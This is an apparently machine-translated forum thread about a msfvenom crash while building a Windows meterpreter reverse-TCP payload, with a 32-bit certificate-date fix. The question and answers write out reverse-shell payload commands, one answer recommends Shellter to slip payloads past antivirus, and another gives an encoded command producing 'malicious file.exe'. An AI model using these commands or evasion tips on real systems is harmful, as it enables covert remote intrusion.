Kali Linux - MSFVenom有效负载创建错误

时间:2018-04-10 02:09:53

标签: linux windows metasploit

所以我刚刚在我的戴尔Inspiron 5000系列,英特尔酷睿i5(第8代)上安装了Kali Linux Rolling!当我试图在MSFVenom中创建Windows反向TCP有效负载时,这是黑客操作系统附带的最佳有效负载创建工具之一,我遇到了一个错误。这就是我输入的内容:

root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

这就是我的回复:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

有没有人知道这里发生了什么?请让我知道!

哦和BTW我已经创建了一个公共有效负载,这将是我的本地有效负载,但奇怪的是,公共一个完成没有任何问题,但一旦我将IPAddress更改为我的本地一个它给了我一个错误:(。

3 个答案:

答案 0 :(得分:1)

这是32位版本上出现的问题。如果对您来说没有关系,请尝试使用64位版本。

如果必须使用32位,则可以从以下位置更改/usr/share/metasploit-framework/lib/msf/core/payload/android.rb文件(在第87行)

cert.not_after = cert.not_before + 3600*24*365*20 # 20 years

cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

请记住,这可能会影响对android有效负载的依赖。

答案 1 :(得分:-1)

最简单的病毒扫描程序和本机Windows扫描程序即使使用编码器也能获取此负载并像疯狂一样引发红旗。

我建议您下载shellter并使用它来掩盖Windows将允许的可执行文件内的有效负载。几乎任何东西都可行。

另外,它只是使用数字多选有效载荷选择。

简单有效

答案 2 :(得分:-2)

您可以在命令下运行。

msfvenom -p windows / meterpreter / reverse_tcp -e x86 / shikata_ga_nai -i 5 -a x86 --platform windows LHOST = 192.168.1.5 LPORT = 443 -f exe&gt;恶意file.exe